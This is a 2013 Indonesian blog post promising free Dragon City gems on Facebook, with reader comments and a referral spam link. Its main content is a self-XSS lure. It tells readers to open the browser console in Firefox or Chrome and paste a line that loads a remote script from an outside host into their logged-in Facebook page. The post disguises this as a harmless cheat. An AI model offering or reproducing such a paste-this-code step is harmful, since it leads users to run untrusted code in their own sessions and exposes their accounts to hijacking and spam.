Announcement:

This is a Testing Annocement. I don't have Much to Say. This is a Place for a Short Product Annocement

Sunday, 17 March 2013

Cara Mendapatkan Gems Dragon City di Facebook

Cara Mendapatkan Gems Dragon City - Lebih Jelas Nya Langsung Aja Ke Tutor Nya :D


UNTUK MOZILLA :
1.KLik CTRL+SHIFT+K
2.Copy Pastekan Code ini :
document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/1292408313/dragoncitygems.txt.js';
3.Klik Enter ...

UNTUK GOOGLE CHROME :
1.Klik Tombol F12
2.Klik Console
3.Copy Paste Code Ini :
document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/1292408313/dragoncitygems.txt.js';
4.Klik Enter...

Happy ^^

Demikian Cara Mendapatkan Gems Dragon City yang bisa saya bagikan. Jika ada kesalahan dalam bentuk apapun,saya mohon maaf yang sebesar-besarnya.

Share it Please

Kalo Mau Tau

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.

15 comments:

  1. Wow ini dia yang gue cari :D
    thx ya gan

    ReplyDelete
    Replies
    1. gimana gan,jelasin yg detail donk..

      Delete
  2. gmna caranya aku gk tau. emang harus pake crhome

    ReplyDelete
  3. Seblum gue coba.. gue bilang Bissmillah.. smoga work 100% dn tnpa dibanned fbq.. amiieenn

    ReplyDelete
  4. gak ngefek gan, giman sih? :(

    ReplyDelete
  5. paste kan kode ny ke mna gan
    tolong gan perlu bantuan ny d jawab yea gan

    ReplyDelete
  6. http://mcent.com/ref/YK8LMP/

    ReplyDelete

Copyright @ 2013 Kalo Mau Tau. Designed by Templateism | Love for The Globe Press